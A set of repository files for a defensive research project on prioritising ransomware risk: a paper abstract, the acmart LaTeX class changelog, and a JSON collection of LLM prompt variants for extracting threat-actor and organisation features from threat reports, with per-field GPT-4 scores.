Assessing and Prioritizing Ransomware Risk Based on Historical Victim Data

We present an approach to identifying which ransomware adversaries are most likely to target specific entities, thereby assisting these entities in formulating better protection strategies. Ransomware poses a formidable cybersecurity threat characterized by profit-driven motives, a complex underlying economy supporting criminal syndicates, and the overt nature of its attacks. This type of malware has consistently ranked among the most prevalent, with a rapid escalation in activity observed. Recent estimates indicate that approximately two-thirds of organizations experienced ransomware attacks in 2023 \cite{Sophos2023Ransomware}. A central tactic in ransomware campaigns is publicizing attacks to coerce victims into paying ransoms. Our study utilizes public disclosures from ransomware victims to predict the likelihood of an entity being targeted by a specific ransomware variant. We employ a Large Language Model (LLM) architecture that uses a unique chain-of-thought, multi-shot prompt methodology to define adversary SKRAM (Skills, Knowledge, Resources, Authorities, and Motivation) profiles from ransomware bulletins, threat reports, and news items. This analysis is enriched with publicly available victim data and is further enhanced by a heuristic for generating synthetic data that reflects victim profiles. Our work culminates in the development of a machine learning model that assists organizations in prioritizing ransomware threats and formulating defenses based on the tactics, techniques, and procedures (TTP) of the most likely attackers.

==> acm/README.txt <==
This package provides a class for typesetting publications of the
Association for Computing Machinery.

Your TeX distribution probably includes the latest released version of
this package.  If you decide to install it yourself, please see the
Installation section of the User's Guide.

Please note that the version on Github is a development (or
experimental) version: please download it for testing new features.
The production version is the one on CTAN and ACM sites.


Changes

Version 1.81   Bug fixes
	       New bib field distinctURL to print URL even if doi is present.
	       Reworded samples

Version 1.80   New journals: DLT, FAC

Version 1.79   Fixed pages with index
	       (https://github.com/borisveytsman/acmart/issues/440)
	       Updated information for TAP, TCPS, TEAC

Version 1.78   Documentation update.
	       Magic texcount comments for samples.
	       Title page now is split if there are too many authors
	       Bug fixes.

Version 1.77   Changed the way to typeset multiple affiliations (Christoph Sommer)

Version 1.76   Added many journal abbreviations to the bst.
	       New experimental option: pbalance
	       ORCID linking code

Version 1.75   \country is now obligatory for addresses.
	       Added \AtBeginMaketitle

Version 1.74   Bug fixes.  A regression introduced in the font changes
	       is reverted.

Version 1.73   Bug fixes
	       The elements institution, city and country are now obligatory
	       for affiliations

Version 1.72   Bug fixes.  Better handling of metadata.

Version 1.71   Bug fixes
               Formats sigchi and sigchi-a are retired
	       Bibliography formatting changes for @inproceedings entries
	       having both series and volume
	       LuaLaTeX now uses the same OTF fonts as XeLaTeX

Version 1.70   Title change for ACM/IMS Transactions on Data Science
               Bug fixes for bibliography

Version 1.69   Bug fixes
	       Compatibility with LaTeX 2020-02-02 release

Version 1.68   Bug fixes
               BST now recognizes words `Paper' or 'Article' in
	       eid or articleno

Version 1.67   Urgent bug fixes:
	       BibTeX style bug fixed (Michael D. Adams)
	       Sigplan special section bugfix

Version 1.66   Bug fixes
	       BibTeX change:  location is now a synonym for city (Feras Saad) 
	       ACM reference format is now mandatory for papers over one page.
	       CCS concepts and keywords are now mandatory for
	       papers over two pages.
	       Authors' addresses are mandatory for journal articles.

Version 1.65   Bug fixes
	       New journal: DGOV
	       DTRAP and HEALTH are now using acmlarge format

Version 1.64    Produce error if abstract is entered after maketitle
		(previously abstract was silently dropped)
		Bug fixes for line numbering

Version 1.63a   Moved TQUANT to TQC

Version 1.63	New journals: TQUANT, FACMP

Version 1.62    Documentation update
		New journal: TELO
		Bug fixes

Version 1.61    Bug fixes
                New bibtex types for artifacts

Version 1.60    New option: urlbreakonhyphens (thanks to Peter Kemp)
		Smaller header size for acmsmall

Version 1.59    Now a journal format can be used for conference proceedings
		All samples are now generated from the same .dtx file
		Bug fixes

Version 1.58    Suppressed spurious warnings.
		New journal:  HEALTH.
		TDSCI is renamed to TDS.

Version 1.57    Change of \baselinestretch now produces an error
                Booktabs is now always loaded
                Added option `balance' to balance last page in two-column mode
                E-mail is no longer split in addresses
                New samples (Stephen Spencer)

Version 1.56    Bug fixes
                Added \flushbottom to two column formats (Philip Quinn)
                The final punctuation for the list of concepts
                is now a period instead of a semicolon (Philip Quinn)
                New command \Description to describe images for visually
                impaired users.

Version 1.55    Bug fixes
                Font changes for SIGCHI table captions

Version 1.54    New option: 'nonacm' (Gabriel Scherer)
                Deleted indent for subsubsection (suggested by Ross Moore)
                Suppressed some obscurious warning in BibTeX processing
                Suppressed hyperrerf warnings (Paolo G. Giarrusso)
                New code for sections to help with accessibility patches
                (Ross Moore)
                Submission id, if present, is printed in anon mode
                Bug fixes

Version 1.53    New journals: PACMCGIT, TIOT, TDSCI

Version 1.52    Another rewording of licenses

Version 1.51    Journal footers now use abbreviated journal titles.
                Corrected the bug with acmPrice.
                Do not show price when copyright is set to iw3c2w3 and iw3c2w3g.
                The package now is compatible with polyglossia (Joachim Breitner).
                Slightly reworded copyright statements.

Version 1.50    Changes in iw3c2w3 and iw3c2w3g

Version 1.49    New jorunal:  DTRAP

Version 1.48    Bug fixes
                Review mode now switches on folios
                Code prettying (Michael D. Adams)
                Bibliography changes: @MISC entries no longer have a
                separate date
                Sigch-a sample bibliography renamed
                Bib code cleanup (Zack Weinberg)
                Acmart and version info are added to pdfcreator tag
                \citeyear no longer produces parenthetical year
                Added initial support for Biblatex (Daniel Thomas)
                Added support for IW3C2 conferences

Version 1.47    New journal: THRI

Version 1.46    Bug fixes for bibliography: label width is now calculated
                correctly.
                All PACM now use screen option.  This requires etoolbox.
                Added subtitle to ACM reference format.
                Now acmart is compatible with fontspec.
                \thanks is now obsolete.  The addresses are automatically
                added to the journal version; this can be overriden with
                \authorsaddresses command.
                Deleted the rule at the end of frontmatter for all formats.
                Deleted new line before doi in the reference format.
                Reintegrated theorem code into acmart.dtx (Matthew Fluet)

Version 1.45    Workaround for a Libertine bug.  Thanks to LianTze Lim
                from Overleaf

Version 1.44    Bug fixes.
                Empty DOI and ISBN suppress printing DOI or ISBN lines
                Separated theorem code into acmthm.sty, loaded by default.
                Article number can be set for proceedings.
                New commands: \acmBooktile, \editor.
                Reference citation format updated.

Version 1.43    Bug fixes

Version 1.42    Deleted ACM badges
                Bug fixes

Version 1.41    Rearranged bib files
                Added new badges

Version 1.40    Bibliography changes
                Added processing of one-compoment ccsdesc nodes
                Bug fixes.
                Made the height a multiple of \baselineskip + \topskip
                Added cleveref
                We no longer print street address in SIGs

Version 1.39    Added \authornotemark commmand

Version 1.38    Increase default font size for SIGPLAN

Version 1.37    Reduce list indentation (Matthew Fluet)

Version 1.36    Bug fixes
                Moved PACMPL to acmlarge format
                New journal: PACMHCI
                Added the possibility to adjust number of author
                boxes per row in conference formats

Version 1.35    Author-year bib style now uses square brackets.
                Changed defaults for TOG sample
                Price is suppressed for usgov and rightsretained modes.
                Bugs fixed

Version 1.34    Deleted DOI from doi numbers
                Changed bibstrip formatting
                The command \terms is now obsolete
                The rulers in review mode now have continuous numbering

Version 1.33    New option `timestamp' (Michael D. Adams)
                New option `authordraft'
                Documentation updates
                Bug fixes
                We now use Type 1 versions of Libertine fonts even with XeTeX.
                New hook acmart-preload-hook.tex (wizards only!)
                Added new options `obeypunctuation' for \affiliation command
                Added SubmissionID
                Added right line count ruler for two-column formats
                Added workaround for Adobe Acrobat bugs in selection
                Added eid field to the bibliography

Version 1.32    New DOI formatting.
                Format siggraph is now obsolete, and sigconf
                is used instead.
                New proceedings title: POMACS.

Version 1.31    Changed default year and month to the current ones
                (thanks to Matteo Riondato)
                Table of contents now works
                Marginalia now work in all formats
                New command \additionalaffiliation
                Documentation changes

Version 1.30    Bibtex style now recognizes https:// in doi.
                Added \frenchspacing.
                \department now has an optional hierarchy level.
                Switched to T1 encoding
                Updated IMWUT and PACMPL

Version 1.29    Documentation changes.  Head height increased from 12pt to 13pt.
                Removed spurious indent at start of abstract.
                Improved kerning in CCS description list.

Version 1.28    Bug fixes: natbib=false now behaves correctly.

Version 1.27    Bug fixes

Version 1.26    Bug fixes

Version 1.25    Updated PACMPL journal option.

Version 1.24    Added IMWUT journal option.

Version 1.23    Added PACM PL journal option.

Version 1.22    Bibliography changes for Aptara backend; should be
                invisible for the users.

Version 1.21    Bibliography changes: added arXiv, some cleanup

Version 1.20    Bug fixes, documentation updates

Version 1.19    Include 'Abstract', 'Acknowledgements', and 'References'
                in PDF bookmarks.

Version 1.18    Natbib is now the default for all versions.  A unified bib
                file is used for all styles.  Better treatment
                of multiple affiliations.


Version 1.17    Formatting changes for margins and lists.  Bug fixes.

Version 1.16    Formatting changes for headers and footers.

Version 1.15    New structured affiliation command.
                New commands for acknowledgements.

Version 1.14    Warn about undefined citation styles; move definitions
                of acmauthoryear and acmnumeric citation styles before
                use.

Version 1.13    Formatting changes: headers, folios etc.
                Bibliography changes.

Version 1.12    Bug fixes and documentation updates.
                Footnotes rearranged.
                Option natbib is now mostly superfluous: the class
                makes a guess based on the format chosen.

Version 1.11    Customization of ACM theorem styles and proof
                environment (Matthew Fluet).

Version 1.10    Bug fixes

Version 1.09    SIGPLAN: revert caption rules (Matthew Fluet)

Version 1.08    SIGPLAN reformatting (Matthew Fluet); bug fixes


==> data/et-isac-db.PromptCollection-20231013.json <==
[{
  "_id": {
    "$oid": "6527ee74d81b60d2b6e4a3e2"
  },
  "type": "campaign-report",
  "name": "Analysis for cyber attack campaigns with no known threat actor",
  "description": "Initial prompt objective for organizations",
  "group_id": "20230830-initial",
  "prompts": [
    {
      "text": "Task: extracting data features for publications about cyber attack campaigns",
      "objective": "Include multiple threat actors if necessary.",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "If an attribute is absent, return null",
      "objective": "Avoid false data",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Make sure the output is strictly based on the provided information",
      "objective": "Avoid spurious data",
      "type": "context",
      "target_field": null
    },
    {
      "text": "Provide values only for the specified JSON keys. Avoid introducing any nested or hierarchical structures.",
      "objective": "Prevent complex JSON structures",
      "type": "constraint",
      "target_field": null
    },
    {
      "text": "Do not invent a new key in the json specification",
      "objective": "Avoid inconsistent data",
      "type": "constraint",
      "target_field": null
    },
    {
      "text": "Provide CVE IDs only if explicitly mentioned",
      "objective": "Avoid invented CVE IDs",
      "type": "instruction",
      "target_field": "vulnerabilities"
    },
    {
      "text": "Only include CVEs in use by the campaigns",
      "objective": "Guidance on which CVEs to use",
      "type": "instruction",
      "target_field": "vulnerabilities"
    },
    {
      "text": "Which countries are specified targets of the campaign?",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "target_countries"
    },
    {
      "text": "Identify where the attacks likely originate from",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "country_of_origin"
    },
    {
      "text": "In no more than one sentence per mitigation, describe how the attack could be mitigated",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "attack_mitigations"
    },
    {
      "text": "What consequences are victims of a successful attack likely to experience?",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "attack_consequences"
    },
    {
      "text": "What is the probable objective of the adversary behind this campaign?",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "campaign_intent"
    },
    {
      "text": "Describe the tactics, techniques, and procedures of the adversary",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "campaign_capabilities"
    },
    {
      "text": "This is distinct from campaign intent and captures the long-term why ",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "campaign_motives"
    }
  ],
  "added_on": {
    "$date": "2023-10-12T13:02:44.813Z"
  },
  "updated_on": null,
  "updated_by": null
},
{
  "_id": {
    "$oid": "6527ee74d81b60d2b6e4a3e3"
  },
  "type": "org-profiler",
  "name": "Organizational Analysis for Mapping to Existing Threats",
  "description": "Initial prompt objective for organizations",
  "group_id": "20230830-initial",
  "prompts": [
    {
      "text": "Instruction: You are a model trained by OpenAI",
      "objective": "provide context",
      "type": "context",
      "target_field": null
    },
    {
      "text": "Task: extracting and summarizing data about various types of organizations",
      "objective": "Include multiple threat actors if necessary.",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Input: organizational or company information from 2023",
      "objective": "Ensure only current data in specification",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "If an attribute is absent, return null",
      "objective": "Avoid false data",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Make sure the output is strictly based on the provided information",
      "objective": "Avoid spurious data",
      "type": "context",
      "target_field": null
    },
    {
      "text": "Don't invent data",
      "objective": "Avoid false data",
      "type": "constraint",
      "target_field": null
    },
    {
      "text": "Do not invent a new key in the json specification",
      "objective": "Avoid inconsistent data",
      "type": "constraint",
      "target_field": null
    },
    {
      "text": "Provide a brief description, less than 255 words who and what this company is.\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "description"
    },
    {
      "text": "Based on the details given, make a clear and concise estimation about the types of data this  company is likely to collect and store.\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "x_information_resources"
    },
    {
      "text": "Based on the given information, make a clear and concise estimation of the regions or geographic areas where this company might operate or have significant influence.\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "x_regions"
    },
    {
      "text": "List the industry sectors in which this company likely operates or holds significant interests.\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "sectors"
    },
    {
      "text": "Based on the data shared, produce a clear and detailed estimation of the ISIC populations does business with.\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "x_populations"
    },
    {
      "text": "Estimate the category of annual revenue where a value of high would be in the billions, and a value of low would be less than a million.\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "x_annual_revenue"
    },
    {
      "text": "Estimate the category of the combined value of organizational assets where a value of high would be in the  billions, and a value of low would be less than a million.\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "x_asset_value"
    },
    {
      "text": "For an organization's strategic importance, categorize based on strategic importance to the nation or  economy in comparison with other organizations\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "x_strategic_importance"
    },
    {
      "text": "For an organization's public profile, categorize based on the notoriety an adversary may receive from a  successful cyber attack against the organization\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "x_public_profile"
    },
    {
      "text": "For an organization's regulatory environment, categorize based on the degree to which the organization is likely to be regulated in cybersecurity or IT management\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "x_regulatory_environment"
    },
    {
      "text": "For an organization's security posture, categorize based on the level at which the organization is likely to invest in and implement strong cybersecurity practices\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "x_security_posture"
    }
  ],
  "added_on": {
    "$date": "2023-10-12T13:02:44.825Z"
  },
  "updated_on": null,
  "updated_by": null
},
{
  "_id": {
    "$oid": "6527ee74d81b60d2b6e4a3e4"
  },
  "type": "org-profiler",
  "name": "Organizational Analysis for Mapping to Existing Threats",
  "description": "Initial prompt objective for organizations",
  "group_id": "20230830-initial",
  "prompts": [
    {
      "text": "Instruction: You are an organizational profiling service",
      "objective": "provide context",
      "type": "context",
      "target_field": null
    },
    {
      "text": "Task: extracting and summarizing data about various types of organizations",
      "objective": "Include multiple threat actors if necessary.",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Input: organizational or company information from 2023",
      "objective": "Ensure only current data in specification",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "If an attribute is absent, return null",
      "objective": "Avoid false data",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Make sure the output is strictly based on the provided information",
      "objective": "Avoid spurious data",
      "type": "context",
      "target_field": null
    },
    {
      "text": "Don't invent data",
      "objective": "Avoid false data",
      "type": "constraint",
      "target_field": null
    },
    {
      "text": "Do not invent a new key in the json specification",
      "objective": "Avoid inconsistent data",
      "type": "constraint",
      "target_field": null
    },
    {
      "text": "Provide a brief description, less than 255 words who and what this company is.\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "description"
    },
    {
      "text": "Based on the details given, make a clear and concise estimation about the types of data this  company is likely to collect and store.\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "x_information_resources"
    },
    {
      "text": "Based on the given information, make a clear and concise estimation of the regions or geographic areas where this company might operate or have significant influence.\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "x_regions"
    },
    {
      "text": "List the industry sectors in which this company likely operates or holds significant interests.\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "sectors"
    },
    {
      "text": "Based on the data shared, produce a clear and detailed estimation of the ISIC populations does business with.\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "x_populations"
    },
    {
      "text": "Estimate the category of annual revenue where a value of high would be in the billions, and a value of low would be less than a million.\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "x_annual_revenue"
    },
    {
      "text": "Estimate the category of the combined value of organizational assets where a value of high would be in the  billions, and a value of low would be less than a million.\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "x_asset_value"
    },
    {
      "text": "For an organization's strategic importance, categorize based on strategic importance to the nation or  economy in comparison with other organizations\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "x_strategic_importance"
    },
    {
      "text": "For an organization's public profile, categorize based on the notoriety an adversary may receive from a  successful cyber attack against the organization\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "x_public_profile"
    },
    {
      "text": "For an organization's regulatory environment, categorize based on the degree to which the organization is likely to be regulated in cybersecurity or IT management\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "x_regulatory_environment"
    },
    {
      "text": "For an organization's security posture, categorize based on the level at which the organization is likely to invest in and implement strong cybersecurity practices\n",
      "objective": "consistency",
      "type": "context",
      "target_field": "x_security_posture"
    }
  ],
  "added_on": {
    "$date": "2023-10-12T13:02:44.827Z"
  },
  "updated_on": null,
  "updated_by": null
},
{
  "_id": {
    "$oid": "6527ee74d81b60d2b6e4a3e5"
  },
  "type": "threat-report",
  "name": "Base Prompts",
  "description": "Only including basic context and instruction",
  "group_id": "threat-analysis-base",
  "prompts": [
    {
      "text": "Task: extracting and summarizing data about multiple threat actors.",
      "objective": "Include multiple threat actors if necessary.",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Input: 2023 cybersecurity threat report.",
      "objective": "Ensure only current data in specification",
      "type": "instruction",
      "target_field": null
    }
  ],
  "added_on": {
    "$date": "2023-10-12T13:02:44.831Z"
  },
  "updated_on": null,
  "updated_by": null,
  "scores": {
    "score": 0.40959170447180815,
    "field_scores": {
      "aliases": 0.6206896551724138,
      "country_of_origin": 0,
      "threat_actor_motives": 0.36764705882352944,
      "threat_actor_intent": 0.5233644859813084,
      "threat_actor_capabilities": 0.5996131528046421,
      "threat_actor_resources": 0.39215686274509803,
      "threat_actor_type": 0.38181818181818183,
      "threat_actor_sophistication": 0,
      "target_countries": 0.5495495495495496,
      "target_regions": 0.1951219512195122,
      "target_populations": 0,
      "target_industry_sectors": 0.4409448818897638,
      "vulnerabilities": 0.6458333333333334
    },
    "model_tested": "GPT-4"
  }
},
{
  "_id": {
    "$oid": "6527ee74d81b60d2b6e4a3e6"
  },
  "type": "threat-report",
  "name": "Self Identification",
  "description": "Broad prompts and self-identification",
  "group_id": "threat-analysis-self-identification",
  "prompts": [
    {
      "text": "Task: extracting and summarizing data about multiple threat actors.",
      "objective": "Include multiple threat actors if necessary.",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Input: 2023 cybersecurity threat report.",
      "objective": "Ensure only current data in specification",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "If an attribute is absent, return null",
      "objective": "Avoid false data",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Make sure the output is strictly based on the provided information",
      "objective": "Avoid spurious data",
      "type": "context",
      "target_field": null
    },
    {
      "text": "Don't invent data",
      "objective": "Avoid false data",
      "type": "constraint",
      "target_field": null
    },
    {
      "text": "Do not invent a new key in the json specification",
      "objective": "Avoid inconsistent data",
      "type": "constraint",
      "target_field": null
    }
  ],
  "added_on": {
    "$date": "2023-10-12T13:02:44.834Z"
  },
  "updated_on": null,
  "updated_by": null,
  "scores": {
    "score": 0.42915531335149865,
    "field_scores": {
      "aliases": 0.631578947368421,
      "country_of_origin": 0,
      "threat_actor_motives": 0.36764705882352944,
      "threat_actor_intent": 0.5188679245283019,
      "threat_actor_capabilities": 0.625,
      "threat_actor_resources": 0.4782608695652174,
      "threat_actor_type": 0.4230769230769231,
      "threat_actor_sophistication": 0,
      "target_countries": 0.5660377358490566,
      "target_regions": 0.1780821917808219,
      "target_populations": 0,
      "target_industry_sectors": 0.45528455284552843,
      "vulnerabilities": 0.7209302325581395
    },
    "model_tested": "GPT-4"
  }
},
{
  "_id": {
    "$oid": "6527be0a2549dd52fd9d8b9a"
  },
  "type": "threat-report",
  "name": "AI Improved Prompts",
  "description": "AI Improved Prompts",
  "group_id": "threat-analysis-ai-improved",
  "prompts": [
    {
      "text": "Your task is to extract and summarize data about multiple threat actors from the provided information.",
      "objective": "Include multiple threat actors if necessary.",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "You're analyzing a cybersecurity threat report from the year 2023.",
      "objective": "Ensure only current data in specification",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "For any missing attribute in the report, return a value of 'null'.",
      "objective": "Avoid false data",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Base your output strictly on the provided report. Do not make assumptions or inferences.",
      "objective": "Avoid spurious data",
      "type": "context",
      "target_field": null
    },
    {
      "text": "Avoid adding or inventing any data not present in the report.",
      "objective": "Avoid false data",
      "type": "constraint",
      "target_field": null
    },
    {
      "text": "When providing output, do not introduce new keys that aren't part of the given JSON specification.",
      "objective": "Avoid inconsistent data",
      "type": "constraint",
      "target_field": null
    },
    {
      "text": "Extract any alternate names or pseudonyms the threat actor is recognized by in the report.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "aliases"
    },
    {
      "text": "Based on the report, specify the resource level the threat actor possesses.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_resources"
    },
    {
      "text": "Classify the threat actor into a specific type or category, as indicated in the report.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_type"
    },
    {
      "text": "This includes the categorical level of sophistication a threat actor is likely to have based on the report",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_sophistication"
    },
    {
      "text": "This includes the vulnerabilities associated with the threat actor using specific CVEs mentioned in the report.",
      "objective": "Guidance on which CVEs to use",
      "type": "instruction",
      "target_field": "vulnerabilities"
    },
    {
      "text": "This includes the specific industry sectors that are at risk or targeted by the threat actor.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "target_industry_sectors"
    },
    {
      "text": "Identify the countries that are explicitly targeted by the threat actor as mentioned in the report.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "target_countries"
    },
    {
      "text": "Determine the specific human population categories mentioned in the report that are directly targeted by the threat actor.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "target_populations"
    },
    {
      "text": "Identify the distinct geographical regions highlighted in the report as being under the threat actor's focus.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "target_regions"
    },
    {
      "text": "Determine the country or countries from which the attacks are most likely originating.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "country_of_origin"
    },
    {
      "text": "This includes the tactical objectives of the threat actor when targeting entities, as stated in the report.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_intent"
    },
    {
      "text": "This includes the specific MITRE ATT&CK techniques employed by the threat actor, as documented in the report.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_capabilities"
    },
    {
      "text": "This includes the deeper, long-term objectives that drive the threat actor's actions, based on the provided report.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_motives"
    }
  ],
  "added_on": {
    "$date": "2023-10-12T09:36:10.646Z"
  },
  "updated_on": null,
  "updated_by": null,
  "scores": {
    "score": 0.47201767304860087,
    "field_scores": {
      "aliases": 0.59375,
      "country_of_origin": 0,
      "threat_actor_motives": 0.5192307692307693,
      "threat_actor_intent": 0.5656565656565656,
      "threat_actor_capabilities": 0.6858407079646017,
      "threat_actor_resources": 0.5531914893617021,
      "threat_actor_type": 0.44642857142857145,
      "threat_actor_sophistication": 0,
      "target_countries": 0.6057692307692307,
      "target_regions": 0.14516129032258066,
      "target_populations": 0,
      "target_industry_sectors": 0.40875912408759124,
      "vulnerabilities": 0.7948717948717948
    },
    "model_tested": "GPT-4"
  }
},
{
  "_id": {
    "$oid": "6527be0a2549dd52fd9d8b99"
  },
  "type": "threat-report",
  "name": "Feature Context",
  "description": "Broad prompts and self-identification",
  "group_id": "threat-analysis-feature-context",
  "prompts": [
    {
      "text": "Task: extracting and summarizing data about multiple threat actors.",
      "objective": "Include multiple threat actors if necessary.",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Input: 2023 cybersecurity threat report.",
      "objective": "Ensure only current data in specification",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "If an attribute is absent, return null",
      "objective": "Avoid false data",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Make sure the output is strictly based on the provided information",
      "objective": "Avoid spurious data",
      "type": "context",
      "target_field": null
    },
    {
      "text": "Don't invent data",
      "objective": "Avoid false data",
      "type": "constraint",
      "target_field": null
    },
    {
      "text": "Do not invent a new key in the json specification",
      "objective": "Avoid inconsistent data",
      "type": "constraint",
      "target_field": null
    },
    {
      "text": "Identify other names the threat actor is known by as listed in the report",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "aliases"
    },
    {
      "text": "Indicate the categorical level of resources a threat actor is likely to have based on the report",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_resources"
    },
    {
      "text": "Indicate the categorical type of threat actor based on the report",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_type"
    },
    {
      "text": "Estimate the categorical level of sophistication a threat actor is likely to have based on the report",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_sophistication"
    },
    {
      "text": "Only include vulnerabilities by referencing the CVEs specified in the report",
      "objective": "Guidance on which CVEs to use",
      "type": "instruction",
      "target_field": "vulnerabilities"
    },
    {
      "text": "Specify which industry sectors are targeted by the threat?",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "target_industry_sectors"
    },
    {
      "text": "Specify which countries are targeted by the threat?",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "target_countries"
    },
    {
      "text": "Specify which population categories are targeted by the threat?",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "target_populations"
    },
    {
      "text": "Specify which geographical regions are targeted by the threat?",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "target_regions"
    },
    {
      "text": "Identify where the attacks likely originate from",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "country_of_origin"
    },
    {
      "text": "This is the tactical objective of the threat actor when attacking an entity",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_intent"
    },
    {
      "text": "Include MITRE ATT&CK technique identifiers used by the threat actor as identified in the report",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_capabilities"
    },
    {
      "text": "This is the underlying and longer-term objective of the threat actor",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_motives"
    }
  ],
  "added_on": {
    "$date": "2023-10-12T09:36:10.638Z"
  },
  "updated_on": null,
  "updated_by": null,
  "scores": {
    "score": 0.45454545454545453,
    "field_scores": {
      "aliases": 0.5714285714285714,
      "country_of_origin": 0,
      "threat_actor_motives": 0.5178571428571429,
      "threat_actor_intent": 0.4854368932038835,
      "threat_actor_capabilities": 0.6828193832599119,
      "threat_actor_resources": 0.5434782608695652,
      "threat_actor_type": 0.3448275862068966,
      "threat_actor_sophistication": 0,
      "target_countries": 0.5636363636363636,
      "target_regions": 0.12698412698412698,
      "target_populations": 0,
      "target_industry_sectors": 0.39416058394160586,
      "vulnerabilities": 0.8378378378378378
    },
    "model_tested": "GPT-4"
  }
},
{
  "_id": {
    "$oid": "6527be0a2549dd52fd9d8b98"
  },
  "type": "threat-report",
  "name": "Broad Constraints",
  "description": "Includes self-identification, and broad constraints",
  "group_id": "threat-analysis-broad-constraints",
  "prompts": [
    {
      "text": "Task: extracting and summarizing data about multiple threat actors.",
      "objective": "Include multiple threat actors if necessary.",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Input: 2023 cybersecurity threat report.",
      "objective": "Ensure only current data in specification",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "If an attribute is absent, return null",
      "objective": "Avoid false data",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Make sure the output is strictly based on the provided information",
      "objective": "Avoid spurious data",
      "type": "context",
      "target_field": null
    },
    {
      "text": "Don't invent data",
      "objective": "Avoid false data",
      "type": "constraint",
      "target_field": null
    },
    {
      "text": "Do not invent a new key in the json specification",
      "objective": "Avoid inconsistent data",
      "type": "constraint",
      "target_field": null
    }
  ],
  "added_on": {
    "$date": "2023-10-12T09:36:10.629Z"
  },
  "updated_on": null,
  "updated_by": null,
  "scores": {
    "score": 0.4384404924760602,
    "field_scores": {
      "aliases": 0.6964285714285714,
      "country_of_origin": 0,
      "threat_actor_motives": 0.3157894736842105,
      "threat_actor_intent": 0.5714285714285714,
      "threat_actor_capabilities": 0.6444906444906445,
      "threat_actor_resources": 0.5581395348837209,
      "threat_actor_type": 0.43137254901960786,
      "threat_actor_sophistication": 0,
      "target_countries": 0.5660377358490566,
      "target_regions": 0.2054794520547945,
      "target_populations": 0,
      "target_industry_sectors": 0.4375,
      "vulnerabilities": 0.6888888888888889
    },
    "model_tested": "GPT-4"
  }
},
{
  "_id": {
    "$oid": "65272240b94ac60f7aee7793"
  },
  "type": "threat-report",
  "name": "Base Prompts",
  "description": "Only including basic context and instruction",
  "group_id": "threat-analysis-base",
  "prompts": [
    {
      "text": "Task: extracting and summarizing data about multiple threat actors.",
      "objective": "Include multiple threat actors if necessary.",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Input: 2023 cybersecurity threat report.",
      "objective": "Ensure only current data in specification",
      "type": "instruction",
      "target_field": null
    }
  ],
  "added_on": {
    "$date": "2023-10-11T22:31:28.581Z"
  },
  "updated_on": null,
  "updated_by": null,
